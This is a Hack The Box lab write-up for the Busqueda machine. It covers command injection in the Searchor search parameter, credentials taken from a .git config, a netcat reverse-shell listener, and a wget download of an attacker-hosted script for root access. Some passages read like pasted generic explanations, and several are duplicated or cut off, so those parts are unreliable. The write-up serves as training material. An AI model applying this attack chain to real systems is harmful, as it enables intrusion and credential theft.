Hack The Box (HTB) is an online platform and community that provides a range of penetration testing and hacking challenges. It is designed to help individuals improve their cybersecurity skills and knowledge in a safe and legal environment.
The IP of the machine instance was 10.10.11.208
Started by running an nmap scan to the machine:
nmap -sC -sV 10.10.11.208
The open ports and services were 22/tcp and 80/tcp.
22/tcp — OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp — Apache/2.4.52 (Ubuntu)
Tried the ip in the browser and having an error.
I manually inputted the host on the /etc/hosts/
10.10.11.208 searcher.htb — by using the nano application then proceed on save.
Once again inputted the ip or url in the browser. We managed to interact with the website ‘Searcher’.
At the bottom of the page there’s actually name of the application ‘Flask and Searchor 2.4.0’.
Upon checking there’s a vulnerability on the searchor. If “searchor” is a real software application, I recommend checking the official website or relevant forums for the software to see if any security advisories or updates have been published. If you are aware of the specific software being referred to, you may also look for CVE (Common Vulnerabilities and Exposures) entries related to that software version, as CVEs are commonly used to track and identify known vulnerabilities in software.
For the most up-to-date and accurate information about vulnerabilities in any software, it’s essential to refer to official sources and stay informed through cybersecurity news and advisories. Additionally, always ensure that your software is up-to-date with the latest patches and security updates to mitigate potential vulnerabilities.
I intercepted the web traffic by Burp. I noticed that there’s an engine=Accuweather&query=. Wherein, we can leverage this, if it’s possible to command injection.
To give you an idea what’s a command injection can do. Command injection is a type of security vulnerability that occurs when an attacker is able to execute arbitrary commands on a computer or system through a vulnerable application. It is a common web application security flaw that occurs when untrusted data is passed to a command shell or operating system as part of a command or query, without proper validation or sanitization.
This vulnerability typically arises when an application allows user input (such as data from web forms or URLs) to be directly incorporated into a command or query that is executed by the underlying system. If the application does not properly validate or sanitize this input, an attacker can craft malicious input to manipulate the command and inject their own code.
Here’s an example of how command injection can occur in a web application that executes shell commands: Suppose there is a web application with a search feature that allows users to search for products by entering a product name. The application constructs a command to search for the product in a backend database, using user input directly:
user_input = request.getParameter(“product_name”)
command = “search_command “ + user_input
result = execute_command(command)
An attacker could exploit this vulnerability by providing malicious input such as: product_name = “‘; malicious_command #”
The resulting command executed on the system would be: The resulting command executed on the system would be:
Got a response of 200 OK.
Added an “ ‘)# “ disregard the last 2 letters SS. Still got the response I wanted.
Time to be creative by inputting the value of query with “weather or anything value the supply the parameter” with the end of command injection inputs.
Managed to got the OK response from the server :)
Hence, the recon phase we already know that the server is running in the operating system Linux. Modified the query by os python with the command line ‘cat etc/passwd’.
We finally got the result we wanted.
Directory listing
In the directory listing, there is a .git folder where contains essentials information where we can know the box more. By using the ‘./git/config’ command we will be able to know the history of the git commands.
The credentials was found in the .git/config then try to list the directory and output the content of the directory.
Username and password — cody: jh1usoih2bkjaspwe92
Double checked the /etc/hosts/ if there is an additional directory to the primary website.
There’s an url : gitea.searcher.htb
Netcat — is a versatile command-line networking utility used for reading from and writing to network connections.
Netcat can be used for several purposes, including:
Netcat, often abbreviated as “nc,” is a versatile command-line networking utility used for reading from and writing to network connections. It is sometimes referred to as the “Swiss Army knife” of networking tools due to its wide range of functionalities. Originally developed for Unix-like operating systems, Netcat has been ported to various platforms, including Windows.
Netcat can be used for several purposes, including:
- Port Scanning: Netcat can scan a range of IP addresses and ports to check for open ports and services running on those ports.
- Creating and Handling Network Connections: Netcat can act as both a client and a server, allowing users to establish and manage network connections for various purposes.
- File Transfer: It can transfer files between machines using various protocols like TCP or UDP.
- Banner Grabbing: Netcat can retrieve banners from services running on specific ports, revealing information about the services and their versions.
- Port Forwarding: It can be used to forward traffic from one port on a local machine to another port on a remote machine.
- Shell and Command Execution: With the help of Netcat, users can execute shell commands on a remote machine and receive the output locally.
- Chat and Messaging: It can be used for simple chat or messaging between machines.
By using the command:
nc -nlvp 4444
To receive any connection from the reverse shell we created.
I added the url in my machine.
The site: gitea.searcher.htb
Go to Sign In: http://gitea.searcher.htb/user/login?redirect_to=%2f
The username and password were exfiltrated on the user that we created on the netcat connection
Username and password — cody: jh1usoih2bkjaspwe92
In the terminal ssh svc@IP, by using the credentials we found the earlier.
List the current the directory to find the user flag.
sudo -l command is used to list the permissions or privileges that the current user has on the system when using the sudo command. sudo stands for "superuser do" and allows authorized users to execute commands with the privileges of the superuser (root) or another user, as specified in the configuration.
Running the commands on busqueda, we can find ports, status,, names and container id by the docker.
Docker is an open-source platform that enables developers to automate the deployment, scaling, and management of applications inside lightweight, portable containers. Containers are self-sufficient units that package all the necessary software, libraries, and configurations required to run an application. Docker allows developers to build, ship, and run applications consistently across different environments, such as development, testing, and production, without worrying about dependencies or underlying system differences.
We found a gitea and mysql_db
The command sytemctl — type=service — state-running essentially use to check the container of the services on the server.
The Docker daemon configuration overview.
URL: https://docs.docker.com/config/daemon/
Checking on the logs you can find an administrator and password.
administrator:yuiu1hoiu4i5ho1uh
Administrator scripts:
- full-checkup.sh
- check-ports.py
- install-flask.sh
- system-checkup.py
check-ports.py
install-flask.sh
system-checkup.py
The scripts can be found in /opt/scripts directory.
Created a script in my machine.
Open an open python server in the desktop directory.
Using the wget — is a command-line utility used for retrieving files from the internet through various protocols, such as HTTP, HTTPS, FTP, and FTPS. The name “wget” stands for “Web Get,” which accurately reflects its primary purpose of downloading files from the web.
wget http://ipTun0:Port/FileName
Wait for the 200 status code. A 200 status code is part of the HTTP status code system and is one of the most common responses returned by web servers. It indicates a successful request, meaning that the server has successfully processed the client’s request and is returning the requested data.
Change modification into executable binary. chmod is a command in Unix-like operating systems (e.g., Linux, macOS, and other Unix variants) used to change the permissions of files and directories. The name "chmod" stands for "change mode."
In Unix-based systems, every file and directory has three types of permissions, which define what actions can be performed on them by different users:
- Read (r): If a file has the read permission, it can be viewed and read by users. For directories, read permission allows listing the contents of the directory.
- Write (w): Write permission allows users to modify the contents of a file or create, delete, and rename files within a directory. For directories, write permission allows adding or removing files.
- Execute (x): Execute permission on a file allows it to be executed as a program or script. For directories, execute permission allows users to access the contents of the directory.
The permissions are specified separately for three different groups of users:
- Owner (u): The user who owns the file or directory.
- Group (g): The group associated with the file or directory.
- Others (o): All other users on the system who are not the owner or in the group.
Then using the command by the sudo -l.
Before we run the binary, open nc for incoming connection.
Got the root.txt
